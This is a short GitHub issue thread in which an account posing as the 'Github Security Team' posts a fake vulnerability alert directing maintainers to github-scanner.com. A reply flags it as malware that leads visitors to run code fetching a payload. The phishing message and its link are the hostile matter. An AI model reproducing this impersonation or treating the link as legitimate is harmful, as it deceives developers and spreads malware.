### ISSUE TITLE
IMPORTANT! Security Vulnerability Detected in your Repository

### ISSUE THREAD

**Issue by aDpshlney01** [BlockstreamResearch/secp256k1-zkp#297]
Hey there!

We have detected a security vulnerability in your repository. Please contact us at https://github-scanner.com to get more information on how to fix this issue.

Best regards,
Github Security Team

**Comment by PastaPastaPasta** [comment]
This is malware: do not access, Ends up asking you to run some code which downloads and runs this malware https://www.virustotal.com/gui/url/875c0f954fe6f1cd78be37453e98fe50474c7e48ff55ab3be0a013b73560f3eb
